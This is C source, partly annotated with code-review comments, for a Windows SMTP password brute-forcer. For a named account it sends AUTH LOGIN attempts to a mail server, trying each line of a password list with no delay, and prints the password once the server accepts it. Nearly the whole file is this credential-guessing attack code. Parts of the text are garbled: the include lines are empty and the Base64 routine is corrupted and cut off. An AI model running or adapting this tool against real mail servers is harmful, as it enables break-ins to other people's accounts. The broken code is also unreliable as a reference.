//E-mail密码暴力破解器
//By RedIce
//E-mail:redice@see.xidian.edu.cn
#include
#include
#pragma comment(lib,"ws2_32.lib")
/* The 64-character Base64 alphabet: A-Z, a-z, 0-9, '+', '/'. */
char *ch64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* File-scope state shared by main() and send_wait(). */
FILE *FileOpr;              /* password list, opened in main() */
SOCKET sender;              /* socket used by send_wait() for send()/recv() */
struct sockaddr_in dest;    /* destination address, filled in by main() */

/* Base64 encoding of srclen bytes starting at src. */
unsigned char *encode(unsigned char *src, int srclen);
/* Send one line and look for responsecode in the reply. */
char send_wait(char *command, char *responsecode, char isencode);
/* Print the usage text. */
void usage();
/* Reset the socket connection. */
void initialsocket();
// Program entry point.
// Command line: "-f <password list>" and "-u <user name>", "-?" for help; the last
// argument is always taken as the SMTP host (name or IP).
// Flow: parse the options, call WSAStartup, resolve the host, fill the global `dest`
// with its address and port 25, open the password list, call initialsocket(), then for
// each line of the list run AUTH LOGIN -> user name -> password through send_wait() and
// stop at the first 235 reply or at end of file. The elapsed time is printed at the end.
// Seen from the server this is a run of AUTH LOGIN exchanges for one account with a
// different password each time, with no pause in between (see the Sleep note below).
// NOTE(review): `void main` is non-standard; hosted C expects `int main`.
void main(int argc,char *argv[])
{
char temp[1024]; // line buffer for the password list; only the first 100 bytes are used below
int k=0,i=0;// k: lines read from the password list so far; i: argv index
DWORD starttime;// tick count taken just before the attempt loop
WSADATA wsa;// filled in by WSAStartup
PHOSTENT hostinfo;// result of the host lookup (name -> IP)
char passfile[201];// password list path
char username[51];// user name
char *ICMP_DEST_IP;// target host as typed, later replaced by its dotted IP string
//char ret;// return value (unused)
memset(passfile,0,201);// clear the password list path
memset(username,0,51);// clear the user name to try
if(1==argc)// no arguments besides the program name: print usage and exit
{
usage();
return;
}
else// at least one argument was given
{
// NOTE(review): strstr() matches the option text anywhere inside an argument, so a
// path or host name that merely contains "-f", "-u" or "-?" is treated as that option.
// NOTE(review): argv[i+1] is read without checking i+1<argc; when an option is the
// last argument, argv[i+1] is argv[argc], i.e. NULL, and strlen(NULL) is undefined.
for(i=1;i<=argc-1;i++)
{
if(strstr(argv[i],"-f"))
{
// reject values that would not fit passfile[201] before the unbounded strcpy
if(strlen(argv[i+1])>=200)
{
printf("密码字典文件名太长!\n");
return;
}
strcpy(passfile,argv[i+1]);
i++;// skip the value; the tests below now look at the value, not at the option
}
if(strstr(argv[i],"-u"))
{
// reject values that would not fit username[51] before the unbounded strcpy
if(strlen(argv[i+1])>=50)
{
printf("用户名名太长!\n");
return;
}
strcpy(username,argv[i+1]);
i++;// skip the value
}
if(strstr(argv[i],"-?"))
{
usage();
return;
}
}
}
// both the user name and the password list are mandatory
if(strlen(username)==0||strlen(passfile)==0)
{
printf("请指定用户名称和密码字典路径!\n\n");
usage();
return;
}
ICMP_DEST_IP=argv[argc-1];// host name or IP: always the last argument, even if that is an option value
if(WSAStartup(MAKEWORD(2,2),&wsa))
{
printf("套接字版本协商出错!\n");
WSACleanup();// NOTE(review): called although WSAStartup has just failed
return;
}
// resolve the host name
hostinfo=gethostbyname(ICMP_DEST_IP); // argument is the host name to resolve
if(NULL==hostinfo)
{
printf("无法解析主机%s的IP地址!",ICMP_DEST_IP);
WSACleanup();
return;
}
else
{
// only the first address of the list is used; it is turned into a dotted string here
// and parsed back with inet_addr() below
ICMP_DEST_IP=inet_ntoa(*(struct in_addr*)*hostinfo->h_addr_list);
}
// fill in the destination address structure
memset(&dest,0,sizeof(dest));
dest.sin_family=AF_INET;
dest.sin_addr.S_un.S_addr=inet_addr(ICMP_DEST_IP);
dest.sin_port=htons(25);// default SMTP port
FileOpr=fopen(passfile,"r");
if(NULL==FileOpr)
{
printf("打开文件失败,请检查输入的文件路径是否正确!\n");
WSACleanup();
return;
}
initialsocket();// set up the socket; presumably creates `sender` and connects it to `dest` - confirm in initialsocket()
starttime=GetTickCount();
while(1)
{
// temp holds 1024 bytes but only 100 are cleared and read, so a line longer than
// 99 characters is split and its remainder is handled as a separate candidate
memset(temp,0,100);
if(NULL==fgets(temp,100,FileOpr)) // read one line of the password list; NULL means end of file or error
break;
else
{
// strip a trailing LF (a CR before it is kept)
// NOTE(review): if the line starts with a NUL byte strlen() is 0 and temp[-1] is accessed
if(temp[strlen(temp)-1]==0x0A)
temp[strlen(temp)-1]=0;
printf("已尝试过%d个密码...%s\n",++k,temp);// progress line: attempt count and the candidate in clear text
// send AUTH LOGIN and expect reply code 334
if(send_wait("AUTH LOGIN","334",0)!=2) continue;
// send the Base64-encoded user name and expect reply code 334
if(send_wait(username,"334",1)!=2) continue;
// send the Base64-encoded password and expect reply code 235
if(2!=send_wait(temp,"235",1))
continue;
else
{
printf("Password:%s\n",temp);
break;
}
}
// NOTE(review): unreachable - every path through the if/else above ends in
// `continue` or `break`, so no delay is ever inserted between attempts
Sleep(200);
}
// NOTE(review): GetTickCount() is called twice, so the two fields use slightly different
// end times, and the DWORD results are printed with %d
printf("程序运行耗时:%ds,%dms\n",(GetTickCount()-starttime)/1000,(GetTickCount()-starttime) % 1000);
fclose(FileOpr);
closesocket(sender);
WSACleanup();
return;
}
// Sends one line over the global socket `sender` and checks the reply for a code.
// Parameters:
//   command      - text to send (CR LF is appended here)
//   responsecode - text looked for in the reply, e.g. "334" or "235"
//   isencode     - non-zero: pass command through encode() (Base64) before sending
// Return value: -1 send failed; 0 recv failed or the 2000 ms check fired;
//   1 the reply did not contain responsecode; 2 the reply contained responsecode.
// NOTE(review): the return type is plain `char`, so whether -1 stays negative depends on
// the signedness of char; the caller shown in this file only compares the result with 2.
char send_wait(char * command,char * responsecode,char isencode)
{
unsigned char *base64;
char smtp_data[101];// data submitted to the SMTP server
char recvbuf[201];// receive buffer
DWORD starttime;// tick count when waiting for the reply starts
memset(smtp_data,0,101);// zero the send buffer; the appends below rely on this for termination
if(isencode)// Base64 encoding requested
{
// NOTE(review): encode() obtains its output buffer with malloc and the pointer
// returned here is never freed, so each encoded send leaks that buffer
base64=encode((unsigned char*)command,strlen(command));
// the byte count is sizeof(base64)-1, i.e. derived from the size of the pointer
memcpy(smtp_data,base64,sizeof(base64)-1);
// overwrite the last copied character with '='
smtp_data[strlen(smtp_data)-1]='=';
}
else
{
// NOTE(review): unbounded copy into a 101-byte buffer; the only unencoded caller
// shown in this file passes the literal "AUTH LOGIN"
strcpy(smtp_data,command);
}
// NOTE(review): nothing checks that two spare bytes remain for CR and LF
smtp_data[strlen(smtp_data)]=0x0D;// append the line ending to the command: CR ...
smtp_data[strlen(smtp_data)]=0x0A;// ... then LF
if(SOCKET_ERROR==send(sender,smtp_data,strlen(smtp_data),0))
{
printf("发送请求出错!\n");
return -1;
}
memset(recvbuf,0,201);// zero the receive buffer; recv reads at most 200 bytes, so it stays NUL-terminated
starttime=GetTickCount();
// NOTE(review): every path through the loop body returns, so it runs at most once and
// the 2000 ms check is evaluated only right after starttime was taken; any real wait
// happens inside recv() - presumably a blocking socket, confirm in initialsocket()
while(1)
{
if(GetTickCount()-starttime>=2000) return 0;
// only SOCKET_ERROR is treated as failure; a return of 0 (peer closed the
// connection) leaves recvbuf empty and falls through to the "code not found" branch
if(SOCKET_ERROR ==recv(sender,recvbuf,200,0))
{
printf("接收信息出错!\n");
return 0;
}
else
{
//printf("smtp server:%s\n",recvbuf);
// the code is matched anywhere in the reply text, not only at the start of a line
if(NULL==strstr(recvbuf,responsecode))
{
// 421 or 451 in the reply: reset the connection before reporting the miss
if(strstr(recvbuf,"421")||strstr(recvbuf,"451"))
initialsocket(); // reset the socket connection
return 1;
}
else // the expected code responsecode was received
return 2;
}
}
}
//Base64编码
unsigned char *encode(unsigned char *src,int srclen)
{
int n,buflen,i,j;
int pading=0;
unsigned char *buf;
static unsigned char *dst;
buf=src;
buflen=n=srclen;
if(n%3!=0) /* pad with '=' by using a temp buffer */
{
pading=1;
buflen=n+3-n%3;
buf=(unsigned char *)malloc(buflen+1);
memset(buf,0,buflen+1);
memcpy(buf,src,n);
for(i=0;i<3-n%3;i++)
buf[n+i]='=';
}
dst=(unsigned char *)malloc(buflen*4/3+1);
memset(dst,0,buflen*4/3+1);
for(i=0,j=0;i>2;
dst[j+1]=((buf[i]&0x03)<<4) + ((buf[i+1]&0xF0)>>4);
dst[j+2]=((buf[i+1]&0x0F)<<2) + ((buf[i+2]&0xC0)>>6);
dst[j+3]=buf[i+2]&0x3F;
}
for(i=0;i